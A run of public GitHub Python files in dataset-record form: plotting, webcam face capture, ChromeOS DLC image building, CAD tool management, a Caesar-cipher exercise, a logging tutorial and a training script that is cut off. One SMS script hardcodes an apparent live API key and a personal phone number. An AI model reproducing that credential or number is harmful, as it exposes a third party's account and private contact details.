BIC$')\n\nax1.xaxis.set_major_formatter(plt.FormatStrFormatter('%.1f'))\nax1.xaxis.set_minor_formatter(plt.FormatStrFormatter('%.1f'))\nax1.xaxis.set_major_locator(plt.LogLocator(10))\nax1.xaxis.set_major_formatter(plt.FormatStrFormatter('%.3g'))\n\nplt.show()\n","repo_name":"ryanmaas/astroML","sub_path":"book_figures/chapter10/fig_LS_example.py","file_name":"fig_LS_example.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"73490663253","text":"import cv2\r\nimport numpy as np\r\nimport os\r\nimport time\r\nimport math\r\nfrom face import Face\r\nfrom ttk import Label\r\nfrom PIL import Image, ImageTk\r\nfrom modules import VideoStream\r\n\r\nclass dataCreator(Label):\r\n def __init__(self,label,vs):\r\n self.face = Face()\r\n self.label = label\r\n self.vs = vs\r\n self.emotions = ['Angry','Happy','Neutral','Sad','Shocked']\r\n self.target = \"Dataset\"\r\n\r\n def create(self):\r\n for emotion in self.emotions:\r\n print (\"please look {}. Press Capture button when ready\".format(emotion))\r\n start_time = time.time()\r\n elapsed_time = time.time()-start_time\r\n sample = 0\r\n if os.path.exists(self.target+os.sep+emotion):\r\n pass\r\n else:\r\n os.mkdir(self.target+os.sep+emotion)\r\n \r\n while True:\r\n while elapsed_time < 3.0 :\r\n image = self.vs.read()\r\n image = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\r\n elapsed_time = int(time.time()-start_time)\r\n \r\n text = \"Starting in {} seconds\".format(3 - elapsed_time)\r\n\r\n cv2.putText(image,str(text),(20,40),cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,0,255),2)\r\n\r\n cv2.waitKey(100)\r\n img = Image.fromarray(image)\r\n\r\n img = ImageTk.PhotoImage(img)\r\n\r\n self.label.configure(image = img)\r\n self.label.image = img\r\n \r\n image = self.vs.read()\r\n \r\n if (sample > 20):\r\n break\r\n else:\r\n gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\r\n image_copy = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\r\n faces = self.face.detect(gray)\r\n for x,y,w,h in faces:\r\n sample += 1\r\n #frame = image[y-10:y+h+10,x-10:x+w+10]\r\n cv2.rectangle(image_copy,(x,y),(x+w,y+h),(255,0,0),1)\r\n cv2.imwrite(self.target + os.sep + emotion + os.sep +str(time.time()) + \".jpg\",image)\r\n\r\n cv2.waitKey(100)\r\n\r\n img = Image.fromarray(image_copy)\r\n\r\n img = ImageTk.PhotoImage(img)\r\n\r\n self.label.configure(image = img)\r\n\r\n self.label.image = img\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"BijayOCT25/Facial-Expression-Recognition-System","sub_path":"dataCreator.py","file_name":"dataCreator.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"44283957219","text":"from setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='pigconf',\n version='0.0.3',\n author=\"Anshuman Rohella\",\n author_email=\"rohella.anshuman@gmail.com\",\n description='A yaml config mapper to create static config classes.',\n url=\"https://github.com/AnshumanRohella/pigconf\",\n classifiers=[\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Operating System :: OS Independent\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n ],\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=find_packages(),\n install_requires=['PyYAML>=5.4.1'],\n extras_require={\n \"dev\": [\n \"pytest>=6.2.2\",\n 
\"check-manifest>=0.46\"\n ],\n },\n)\n","repo_name":"AnshumanRohella/pigconf","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"43974112263","text":"from __future__ import print_function\n\nimport hashlib\nimport json\nimport math\nimport os\nimport shutil\n\nfrom chromite.lib import commandline\nfrom chromite.lib import cros_build_lib\nfrom chromite.lib import cros_logging as logging\nfrom chromite.lib import osutils\n\nfrom chromite.scripts import cros_set_lsb_release\n\nDLC_META_DIR = 'opt/google/dlc/'\nDLC_IMAGE_DIR = 'build/rootfs/dlc/'\nLSB_RELEASE = 'etc/lsb-release'\n\n# This file has major and minor version numbers that the update_engine client\n# supports. These values are needed for generating a delta/full payload.\nUPDATE_ENGINE_CONF = 'etc/update_engine.conf'\n\n_EXTRA_RESOURCES = (\n UPDATE_ENGINE_CONF,\n)\n\nDLC_ID_KEY = 'DLC_ID'\nDLC_PACKAGE_KEY = 'DLC_PACKAGE'\nDLC_NAME_KEY = 'DLC_NAME'\nDLC_APPID_KEY = 'DLC_RELEASE_APPID'\n\n_SQUASHFS_TYPE = 'squashfs'\n_EXT4_TYPE = 'ext4'\n\n\ndef HashFile(file_path):\n \"\"\"Calculate the sha256 hash of a file.\n\n Args:\n file_path: (str) path to the file.\n\n Returns:\n [str]: The sha256 hash of the file.\n \"\"\"\n sha256 = hashlib.sha256()\n with open(file_path, 'rb') as f:\n for b in iter(lambda: f.read(2048), b''):\n sha256.update(b)\n return sha256.hexdigest()\n\n\nclass DlcGenerator(object):\n \"\"\"Object to generate DLC artifacts.\"\"\"\n # Block size for the DLC image.\n # We use 4K for various reasons:\n # 1. it's what imageloader (linux kernel) supports.\n # 2. it's what verity supports.\n _BLOCK_SIZE = 4096\n # Blocks in the initial sparse image.\n _BLOCKS = 500000\n # Version of manifest file.\n _MANIFEST_VERSION = 1\n\n # The DLC root path inside the DLC module.\n _DLC_ROOT_DIR = 'root'\n\n def __init__(self, src_dir, sysroot, install_root_dir, fs_type,\n pre_allocated_blocks, version, dlc_id, dlc_package, name):\n \"\"\"Object initializer.\n\n Args:\n src_dir: (str) path to the DLC source root directory.\n sysroot: (str) The path to the build root directory.\n install_root_dir: (str) The path to the root installation directory.\n fs_type: (str) file system type.\n pre_allocated_blocks: (int) number of blocks pre-allocated on device.\n version: (str) DLC version.\n dlc_id: (str) DLC ID.\n dlc_package: (str) DLC Package.\n name: (str) DLC name.\n \"\"\"\n self.src_dir = src_dir\n self.sysroot = sysroot\n self.install_root_dir = install_root_dir\n self.fs_type = fs_type\n self.pre_allocated_blocks = pre_allocated_blocks\n self.version = version\n self.dlc_id = dlc_id\n self.dlc_package = dlc_package\n self.name = name\n\n self.meta_dir = os.path.join(self.install_root_dir, DLC_META_DIR,\n self.dlc_id, self.dlc_package)\n self.image_dir = os.path.join(self.install_root_dir, DLC_IMAGE_DIR,\n self.dlc_id, self.dlc_package)\n osutils.SafeMakedirs(self.meta_dir)\n osutils.SafeMakedirs(self.image_dir)\n\n # Create path for all final artifacts.\n self.dest_image = os.path.join(self.image_dir, 'dlc.img')\n self.dest_table = os.path.join(self.meta_dir, 'table')\n self.dest_imageloader_json = os.path.join(self.meta_dir, 'imageloader.json')\n\n def SquashOwnerships(self, path):\n \"\"\"Squash the owernships & permissions for files.\n\n Args:\n path: (str) path that contains all files to be processed.\n \"\"\"\n cros_build_lib.SudoRunCommand(['chown', '-R', '0:0', path])\n 
cros_build_lib.SudoRunCommand(\n ['find', path, '-exec', 'touch', '-h', '-t', '197001010000.00', '{}',\n '+'])\n\n def CreateExt4Image(self):\n \"\"\"Create an ext4 image.\"\"\"\n with osutils.TempDir(prefix='dlc_') as temp_dir:\n mount_point = os.path.join(temp_dir, 'mount_point')\n # Create a raw image file.\n with open(self.dest_image, 'w') as f:\n f.truncate(self._BLOCKS * self._BLOCK_SIZE)\n # Create an ext4 file system on the raw image.\n cros_build_lib.RunCommand(\n ['/sbin/mkfs.ext4', '-b', str(self._BLOCK_SIZE), '-O',\n '^has_journal', self.dest_image], capture_output=True)\n # Create the mount_point directory.\n osutils.SafeMakedirs(mount_point)\n # Mount the ext4 image.\n osutils.MountDir(self.dest_image, mount_point, mount_opts=('loop', 'rw'))\n\n try:\n self.SetupDlcImageFiles(mount_point)\n finally:\n # Unmount the ext4 image.\n osutils.UmountDir(mount_point)\n # Shrink to minimum size.\n cros_build_lib.RunCommand(\n ['/sbin/e2fsck', '-y', '-f', self.dest_image], capture_output=True)\n cros_build_lib.RunCommand(\n ['/sbin/resize2fs', '-M', self.dest_image], capture_output=True)\n\n def CreateSquashfsImage(self):\n \"\"\"Create a squashfs image.\"\"\"\n with osutils.TempDir(prefix='dlc_') as temp_dir:\n squashfs_root = os.path.join(temp_dir, 'squashfs-root')\n self.SetupDlcImageFiles(squashfs_root)\n\n cros_build_lib.RunCommand(['mksquashfs', squashfs_root, self.dest_image,\n '-4k-align', '-noappend'],\n capture_output=True)\n\n # We changed the ownership and permissions of the squashfs_root\n # directory. Now we need to remove it manually.\n osutils.RmDir(squashfs_root, sudo=True)\n\n def SetupDlcImageFiles(self, dlc_dir):\n \"\"\"Prepares the directory dlc_dir with all the files a DLC needs.\n\n Args:\n dlc_dir: (str) The path to where to setup files inside the DLC.\n \"\"\"\n dlc_root_dir = os.path.join(dlc_dir, self._DLC_ROOT_DIR)\n osutils.SafeMakedirs(dlc_root_dir)\n osutils.CopyDirContents(self.src_dir, dlc_root_dir)\n self.PrepareLsbRelease(dlc_dir)\n self.CollectExtraResources(dlc_dir)\n self.SquashOwnerships(dlc_dir)\n\n def PrepareLsbRelease(self, dlc_dir):\n \"\"\"Prepare the file /etc/lsb-release in the DLC module.\n\n This file is used dropping some identification parameters for the DLC.\n\n Args:\n dlc_dir: (str) The path to root directory of the DLC. e.g. mounted point\n when we are creating the image.\n \"\"\"\n # Reading the platform APPID and creating the DLC APPID.\n platform_lsb_release = osutils.ReadFile(os.path.join(self.sysroot,\n LSB_RELEASE))\n app_id = None\n for line in platform_lsb_release.split('\\n'):\n if line.startswith(cros_set_lsb_release.LSB_KEY_APPID_RELEASE):\n app_id = line.split('=')[1]\n if app_id is None:\n raise Exception('%s does not have a valid key %s' %\n (platform_lsb_release,\n cros_set_lsb_release.LSB_KEY_APPID_RELEASE))\n\n fields = {\n DLC_ID_KEY: self.dlc_id,\n DLC_PACKAGE_KEY: self.dlc_package,\n DLC_NAME_KEY: self.name,\n # The DLC appid is generated by concatenating the platform appid with\n # the DLC ID using an underscore. 
This pattern should never be changed\n # once set otherwise it can break a lot of things!\n DLC_APPID_KEY: '%s_%s' % (app_id, self.dlc_id),\n }\n\n lsb_release = os.path.join(dlc_dir, LSB_RELEASE)\n osutils.SafeMakedirs(os.path.dirname(lsb_release))\n content = ''.join(['%s=%s\\n' % (k, v) for k, v in fields.items()])\n osutils.WriteFile(lsb_release, content)\n\n def CollectExtraResources(self, dlc_dir):\n \"\"\"Collect the extra resources needed by the DLC module.\n\n Look at the documentation around _EXTRA_RESOURCES.\n\n Args:\n dlc_dir: (str) The path to root directory of the DLC. e.g. mounted point\n when we are creating the image.\n \"\"\"\n for r in _EXTRA_RESOURCES:\n source_path = os.path.join(self.sysroot, r)\n target_path = os.path.join(dlc_dir, r)\n osutils.SafeMakedirs(os.path.dirname(target_path))\n shutil.copyfile(source_path, target_path)\n\n def CreateImage(self):\n \"\"\"Create the image and copy the DLC files to it.\"\"\"\n if self.fs_type == _EXT4_TYPE:\n self.CreateExt4Image()\n elif self.fs_type == _SQUASHFS_TYPE:\n self.CreateSquashfsImage()\n else:\n raise ValueError('Wrong fs type: %s used:' % self.fs_type)\n\n def GetImageloaderJsonContent(self, image_hash, table_hash, blocks):\n \"\"\"Return the content of imageloader.json file.\n\n Args:\n image_hash: (str) sha256 hash of the DLC image.\n table_hash: (str) sha256 hash of the DLC table file.\n blocks: (int) number of blocks in the DLC image.\n\n Returns:\n [str]: content of imageloader.json file.\n \"\"\"\n return {\n 'fs-type': self.fs_type,\n 'id': self.dlc_id,\n 'package': self.dlc_package,\n 'image-sha256-hash': image_hash,\n 'image-type': 'dlc',\n 'is-removable': True,\n 'manifest-version': self._MANIFEST_VERSION,\n 'name': self.name,\n 'pre-allocated-size': self.pre_allocated_blocks * self._BLOCK_SIZE,\n 'size': blocks * self._BLOCK_SIZE,\n 'table-sha256-hash': table_hash,\n 'version': self.version,\n }\n\n def GenerateVerity(self):\n \"\"\"Generate verity parameters and hashes for the image.\"\"\"\n with osutils.TempDir(prefix='dlc_') as temp_dir:\n hash_tree = os.path.join(temp_dir, 'hash_tree')\n # Get blocks in the image.\n blocks = math.ceil(\n os.path.getsize(self.dest_image) / self._BLOCK_SIZE)\n result = cros_build_lib.RunCommand(\n ['verity', 'mode=create', 'alg=sha256', 'payload=' + self.dest_image,\n 'payload_blocks=' + str(blocks), 'hashtree=' + hash_tree,\n 'salt=random'], capture_output=True)\n table = result.output\n\n # Append the merkle tree to the image.\n osutils.WriteFile(self.dest_image, osutils.ReadFile(hash_tree), 'a+')\n\n # Write verity parameter to table file.\n osutils.WriteFile(self.dest_table, table)\n\n # Compute image hash.\n image_hash = HashFile(self.dest_image)\n table_hash = HashFile(self.dest_table)\n # Write image hash to imageloader.json file.\n blocks = math.ceil(\n os.path.getsize(self.dest_image) / self._BLOCK_SIZE)\n imageloader_json_content = self.GetImageloaderJsonContent(\n image_hash, table_hash, int(blocks))\n with open(self.dest_imageloader_json, 'w') as f:\n json.dump(imageloader_json_content, f)\n\n def GenerateDLC(self):\n \"\"\"Generate a DLC artifact.\"\"\"\n # Create the image and copy the DLC files to it.\n self.CreateImage()\n # Generate hash tree and other metadata.\n self.GenerateVerity()\n\n\ndef CopyAllDlcs(sysroot, install_root_dir):\n \"\"\"Copies all DLC image files into the images directory.\n\n Copies the DLC image files in the given build directory into the given DLC\n image directory. 
If the DLC build directory does not exist, or there is no DLC\n for that board, this function does nothing.\n\n Args:\n sysroot: Path to directory containing DLC images, e.g /build/.\n install_root_dir: Path to DLC output directory,\n e.g. src/build/images//.\n \"\"\"\n output_dir = os.path.join(install_root_dir, 'dlc')\n build_dir = os.path.join(sysroot, DLC_IMAGE_DIR)\n\n if not os.path.exists(build_dir) or not os.listdir(build_dir):\n logging.info('There is no DLC to copy to output, ignoring.')\n return\n\n logging.info('Copying all DLC images to their destination path.')\n logging.info('Detected the following DLCs: %s',\n ', '.join(os.listdir(build_dir)))\n\n osutils.SafeMakedirs(output_dir)\n osutils.CopyDirContents(build_dir, output_dir)\n\n logging.info('Done copying the DLCs to their destination.')\n\ndef GetParser():\n \"\"\"Creates an argument parser and returns it.\"\"\"\n parser = commandline.ArgumentParser(description=__doc__)\n # This script is used both for building an individual DLC or copying all final\n # DLCs images to their final destination nearby chromiumsos_test_image.bin,\n # etc. These two arguments are required in both cases.\n parser.add_argument('--sysroot', type='path', metavar='DIR', required=True,\n help=\"The root path to the board's build root, e.g. \"\n \"/build/eve\")\n parser.add_argument('--install-root-dir', type='path', metavar='DIR',\n required=True,\n help='If building a specific DLC, it is the root path to'\n ' install DLC images (%s) and metadata (%s). Otherwise it'\n ' is the target directory where the Chrome OS images gets'\n ' dropped in build_image, e.g. '\n 'src/build/images//latest.' % (DLC_IMAGE_DIR,\n DLC_META_DIR))\n\n one_dlc = parser.add_argument_group('Arguments required for building only '\n 'one DLC')\n one_dlc.add_argument('--src-dir', type='path', metavar='SRC_DIR_PATH',\n help='Root directory path that contains all DLC files '\n 'to be packed.')\n one_dlc.add_argument('--pre-allocated-blocks', type=int,\n metavar='PREALLOCATEDBLOCKS',\n help='Number of blocks (block size is 4k) that need to'\n 'be pre-allocated on device.')\n one_dlc.add_argument('--version', metavar='VERSION', help='DLC Version.')\n one_dlc.add_argument('--id', metavar='ID', help='DLC ID (unique per DLC).')\n one_dlc.add_argument('--package', metavar='PACKAGE',\n help='The package ID that is unique within a DLC, One'\n ' DLC cannot have duplicate package IDs.')\n one_dlc.add_argument('--name', metavar='NAME',\n help='A human-readable name for the DLC.')\n one_dlc.add_argument('--fs-type', metavar='FS_TYPE', default=_SQUASHFS_TYPE,\n choices=(_SQUASHFS_TYPE, _EXT4_TYPE),\n help='File system type of the image.')\n return parser\n\n\ndef ValidateArguments(opts):\n \"\"\"Validates the correctness of the passed arguments.\n\n Args:\n opts: Parsed arguments.\n \"\"\"\n # Make sure if the intention is to build one DLC, all the required arguments\n # are passed.\n per_dlc_req_args = ('src_dir', 'pre_allocated_blocks', 'version', 'id',\n 'package', 'name')\n if (opts.id and\n not all(vars(opts)[arg] is not None for arg in per_dlc_req_args)):\n raise Exception('If the intention is to build only one DLC, all the flags'\n '%s required for it should be passed .' 
% per_dlc_req_args)\n\n if opts.fs_type == _EXT4_TYPE:\n raise Exception('ext4 unsupported, see https://crbug.com/890060')\n\n\ndef main(argv):\n opts = GetParser().parse_args(argv)\n opts.Freeze()\n\n ValidateArguments(opts)\n\n if opts.id:\n logging.info('Building DLC %s', opts.id)\n dlc_generator = DlcGenerator(src_dir=opts.src_dir,\n sysroot=opts.sysroot,\n install_root_dir=opts.install_root_dir,\n fs_type=opts.fs_type,\n pre_allocated_blocks=opts.pre_allocated_blocks,\n version=opts.version,\n dlc_id=opts.id,\n dlc_package=opts.package,\n name=opts.name)\n dlc_generator.GenerateDLC()\n else:\n CopyAllDlcs(opts.sysroot, opts.install_root_dir)\n","repo_name":"qinjidong/EasyChromium75","sub_path":"src/third_party/chromite/scripts/build_dlc.py","file_name":"build_dlc.py","file_ext":"py","file_size_in_byte":15210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"73173046932","text":"'''\nhttps://www.textlocal.in/free-developer-sms-api/\n'''\n \nimport urllib.request\nimport urllib.parse\n \ndef sendSMS(apikey, numbers, sender, message):\n data = urllib.parse.urlencode({'apikey': apikey, 'numbers': numbers,\n 'message' : message, 'test': 'true' })\n data = data.encode('utf-8')\n request = urllib.request.Request(\"https://api.textlocal.in/send/?\")\n f = urllib.request.urlopen(request, data)\n fr = f.read()\n return(fr)\n \nresp = sendSMS('NGI2YzU5NDYzOTc1Njk3NjMzNDMzODQyNTc0ZDc1NmU=', '+918447389366',\n 'Anubha', 'Hi there, thank you for sending your first test message from Textlocal. See how you can send effective SMS campaigns here: https://tx.gl/r/2nGVj/')\nprint (resp)","repo_name":"anubhavpatrick/sms-whatsapp-integration","sub_path":"sms_api_textlocal.py","file_name":"sms_api_textlocal.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10191994673","text":"import string\n\nprint(string.ascii_lowercase)\nprint(string.ascii_uppercase)\n'''\nlis1 = [0, 1, 2, 3]\nlis2 = [4, 5, 6, 7]\n\ntest1 = zip(lis1, lis2)\n# print(test1)\nd = dict()\nfor k,v in test1:\n d[k] = v\nprint(d)\n'''\nlower_list = list(string.ascii_lowercase)\n# print(lower_list)\n# list(range(1, 26+1))\n\nz = zip(lower_list, list(range(1, 26+1)))\nd = dict()\nfor k,v in z:\n d[k] = v\nprint(d)\nrev_d = {v:k for k,v in d.items()}\n# shift字母编号\nshift = 2\n\n'''\n# 约束在[1, 26]\nif result > 26:\n while result > 26:\n result -= 26\nif result < 1:\n while result < 1:\n result += 26\n'''\nword = \"apple\"\nnew_word = []\nfor letter in word:\n index = d[letter] # 索引值\n index += shift# 索引值加shift,加密\n if index > 26:\n while index > 26:\n index -= 26\n if index < 1:\n while index < 1:\n index += 26\n new_letter = rev_d[index]# 反查,变成密文\n new_word.append(new_letter)\n # str化\nnew_word = ''.join(c for c in new_word)\nprint(new_word)\n\nindex = d[letter] # 索引值\nindex += shift# 索引值加shift,加密\nif index > 26:\n while index > 26:\n index -= 26\nif index < 1:\n while index < 1:\n index += 26\nnew_letter = rev_d[index]# 反查,变成密文\n\n","repo_name":"KellyHwong/MIT.Intro.To.CS.Python","sub_path":"ps4/testZip.py","file_name":"testZip.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"15510695021","text":"from PyQt6.QtCore import pyqtSignal, QObject\n\n\nclass DummyTool(object):\n \"\"\" For use in place of None checks in the code\n reduces boilerplate\n \"\"\"\n action_name = 
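The Caesar-shift exercise in testZip.py above normalizes indices into [1, 26] with while loops; the same shift can be expressed more compactly with modular arithmetic on 0-based alphabet offsets. A minimal equivalent sketch, assuming lowercase-only input:

import string

def caesar_shift(word, shift):
    """Shift each lowercase letter by `shift` positions, wrapping around the alphabet."""
    shifted = []
    for letter in word:
        offset = (string.ascii_lowercase.index(letter) + shift) % 26
        shifted.append(string.ascii_lowercase[offset])
    return ''.join(shifted)

print(caesar_shift('apple', 2))  # -> 'crrng', matching the while-loop version above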
'action_dummy_tool'\n\n def methodPrefix(self):\n return \"dummyTool\" # first letter should be lowercase\n\n def setActive(self, bool):\n pass\n\n def lastLocation(self):\n return None\n\n def setSelectionFilter(self, filter_name_list):\n pass\n\n\ndummy_tool = DummyTool()\n\n\nclass AbstractToolManager(QObject):\n \"\"\"Manages interactions between the slice widgets/UI and the model.\"\"\"\n\n def __init__(self, tool_group_name, window, viewroot):\n \"\"\"\n We store mainWindow because a controller's got to have\n references to both the layer above (UI) and the layer below (model)\n \"\"\"\n super(AbstractToolManager, self).__init__()\n self.window = window\n self.viewroot = viewroot\n self.document = window.document()\n self.tool_group_name = tool_group_name\n self._active_tool = dummy_tool\n self._active_part = None\n self.tool_names = None\n # end def\n\n ### SIGNALS ###\n activeToolChangedSignal = pyqtSignal(str)\n\n def installTools(self):\n if self.viewroot.manager is None:\n raise ValueError(\"Please call viewroot.setManager before calling installTools\")\n # Call installTool on every tool\n tnames = self.tool_names\n if tnames is None:\n raise ValueError(\"Please define tools_names of AbstractToolManager subclass\")\n for tool_name in tnames:\n self.installTool(tool_name)\n # end def\n\n def installTool(self, tool_name):\n window = self.window\n tgn = self.tool_group_name\n\n l_tool_name = tool_name.lower()\n action_name = 'action_%s_%s' % (tgn, l_tool_name)\n if hasattr(window, action_name):\n tool_widget = getattr(window, action_name)\n else:\n tool_widget = None\n tool = getattr(self, l_tool_name + '_tool')\n tool.action_name = action_name\n\n set_active_tool_method_name = 'choose%sTool' % (tool_name)\n\n def clickHandler(self):\n if tool_widget is not None:\n tool_widget.setChecked(True)\n self.setActiveTool(tool)\n if hasattr(tool, 'widgetClicked'):\n if l_tool_name != 'select':\n self.document.clearAllSelected()\n tool.widgetClicked()\n # end def\n\n setattr(self.__class__, set_active_tool_method_name, clickHandler)\n handler = getattr(self, set_active_tool_method_name)\n if tool_widget is not None:\n tool_widget.triggered.connect(handler)\n return tool_widget\n # end def\n\n def deactivateAllTools(self):\n \"\"\" uncheck all tools in this group and set the active tool to None\n \"\"\"\n window = self.window\n tgn = self.tool_group_name\n if self._active_tool is not None:\n self._active_tool.setActive(False)\n for tool_name in self.tool_names:\n l_tool_name = tool_name.lower()\n action_name = 'action_%s_%s' % (tgn, l_tool_name)\n tool_widget = getattr(window, action_name)\n tool_widget.setChecked(False)\n self._active_tool = dummy_tool\n # end def\n\n def destroy(self):\n window = self.window\n tgn = self.tool_group_name\n if self._active_tool is not None:\n self._active_tool.setActive(False)\n for tool_name in self.tool_names:\n l_tool_name = tool_name.lower()\n action_name = 'action_%s_%s' % (tgn, l_tool_name)\n tool_widget = getattr(window, action_name)\n set_active_tool_method_name = 'choose%sTool' % (tool_name)\n handler = getattr(self, set_active_tool_method_name)\n tool_widget.triggered.disconnect(handler)\n tool_widget.setChecked(False)\n self._active_tool = dummy_tool\n self.window = None\n # end def\n\n def activeToolGetter(self):\n return self._active_tool\n # end def\n\n def setActiveTool(self, new_active_tool):\n if new_active_tool == self._active_tool:\n return\n if new_active_tool is None:\n new_active_tool = dummy_tool\n\n if self._active_tool is not None:\n 
self._active_tool.setActive(False)\n\n self._active_tool = new_active_tool\n self._active_tool.setActive(True)\n self.activeToolChangedSignal.emit(self._active_tool.action_name)\n # end def\n\n def getFilterList(self):\n return self.document.filter_list\n# end class\n","repo_name":"douglaslab/cadnano2.5","sub_path":"cadnano/views/abstractitems/abstracttoolmanager.py","file_name":"abstracttoolmanager.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"4007956497","text":"# Tarefa 2\n\nfrom dino_runner.utils.constants import BIRD\nfrom dino_runner.components.obstacles.obstacle import Obstacle\n\nY_POS_BIRD = 250\n\nclass Bird(Obstacle):\n def __init__(self, images):\n self.type = 0\n self.image = BIRD\n\n super().__init__(images, self.type)\n \n self.rect.y = Y_POS_BIRD\n self.bird_index = 0\n\n def draw(self, screen):\n\n if self.bird_index < 5:\n self.image = 0\n else:\n self.image = 1\n \n screen.blit(self.images[self.image], (self.rect.x, self.rect.y))\n\n self.bird_index += 1\n\n if self.bird_index >= 10:\n self.bird_index = 0\n\n","repo_name":"Cleyton0ff/CM_BR-MOD2-T4","sub_path":"dino_runner/components/obstacles/bird.py","file_name":"bird.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"7832961647","text":"import re\r\n\r\n# str = 'Cats are smarter than dogs'\r\n#\r\n# m1 = re.match(r'(.*)are(.*?).*', str)\r\n# print(m1)\r\n#\r\n# print(m1.group())\r\n# print(m1.group(0))\r\n# print(m1.groups(1))\r\n\r\nm = re.match('[abcd]','ab')\r\nprint(m)\r\n\r\na,b = [0,1]\r\nprint(f'a={a},b={b}')\r\n\r\ns = '(.*?)wow(0*?)'\r\n\r\n# m2 = re.match('hello','world hello')\r\n# print(m2)","repo_name":"Demon1630/python","sub_path":"正则表达式.py","file_name":"正则表达式.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72117873174","text":"import logging\n\n# 日志级别\n# 将信息打印到控制台上\n# logging.debug(u\"苍井空\")\n# logging.info(u\"麻生希\")\n# logging.warning(u\"小泽玛利亚\")\n# logging.error(u\"桃谷绘里香\")\n# logging.critical(u\"泷泽萝拉\")\n\n# 设置日志级别\n# logging.basicConfig(level=logging.NOTSET)\n\n# 部分名词解释\n# Logging.Formatter:这个类配置了日志的格式,在里面自定义设置日期和时间,输出日志的时候将会按照设置的格式显示内容。\n# Logging.Logger:Logger是Logging模块的主体,进行以下三项工作:\n# 1. 为程序提供记录日志的接口\n# 2. 判断日志所处级别,并判断是否要过滤\n# 3. 
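The installTool method of AbstractToolManager above synthesizes one choose<Name>Tool method per tool at runtime via a closure plus setattr. A stripped-down sketch of that pattern, independent of Qt — all names here are illustrative, not taken from the original:

class ToolManager:
    def __init__(self, tool_names):
        self._active_tool = None
        for tool_name in tool_names:
            self._install(tool_name)

    def _install(self, tool_name):
        def click_handler(self, _name=tool_name):  # default arg binds the name now
            self._active_tool = _name
            print('active tool:', _name)
        # attaches e.g. choosePencilTool to the class at runtime
        setattr(self.__class__, 'choose%sTool' % tool_name.capitalize(), click_handler)

manager = ToolManager(['select', 'pencil'])
manager.choosePencilTool()  # prints: active tool: pencil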
根据其日志级别将该条日志分发给不同handler\n# 常用函数有:\n# Logger.setLevel() 设置日志级别\n# Logger.addHandler() 和 Logger.removeHandler() 添加和删除一个Handler\n# Logger.addFilter() 添加一个Filter,过滤作用\n# Logging.Handler:Handler基于日志级别对日志进行分发,如设置为WARNING级别的Handler只会处理WARNING及以上级别的日志。\n# 常用函数有:\n# setLevel() 设置级别\n# setFormatter() 设置Formatter\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s') # logging.basicConfig函数对日志的输出格式及方式做相关配置\n# 由于日志基本配置中级别设置为DEBUG,所以一下打印信息将会全部显示在控制台上\nlogging.info('this is a loggging info message')\nlogging.debug('this is a loggging debug message')\nlogging.warning('this is loggging a warning message')\nlogging.error('this is an loggging error message')\nlogging.critical('this is a loggging critical message')\n\n# 日志输出-文件\nimport logging # 引入logging模块\nimport os.path\nimport time\n# 第一步,创建一个logger\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO) # Log等级总开关\n# 第二步,创建一个handler,用于写入日志文件\nrq = time.strftime('%Y%m%d%H%M', time.localtime(time.time()))\nlog_path = os.path.dirname(os.getcwd()) + '/Logs/'\nlog_name = log_path + rq + '.log'\nlogfile = log_name\nfh = logging.FileHandler(logfile, mode='w')\nfh.setLevel(logging.DEBUG) # 输出到file的log等级的开关\n# 第三步,定义handler的输出格式\nformatter = logging.Formatter(\"%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s\")\nfh.setFormatter(formatter)\n# 第四步,将logger添加到handler里面\nlogger.addHandler(fh)\n# 日志\nlogger.debug('this is a logger debug message')\nlogger.info('this is a logger info message')\nlogger.warning('this is a logger warning message')\nlogger.error('this is a logger error message')\nlogger.critical('this is a logger critical message')\n\n","repo_name":"heiheisenberg/chuangyeba_PythonSpider","sub_path":"辅助文件/logging_test.py","file_name":"logging_test.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"3734227484","text":"import os\nimport sys\nimport time\nimport argparse\nimport jsonlines\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np\n\nfrom random import random\nfrom tqdm import trange\n\nfrom supersasrec import SuperSASRecModel\nfrom utils import *\n\nchoice = lambda x: x[np.random.randint(len(x))] if isinstance(\n x, list) else choice(list(x))\n\ndef str2bool(s):\n if s.lower() not in {'false', 'true'}:\n raise ValueError('Not a valid boolean string')\n return s.lower() == 'true'\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', 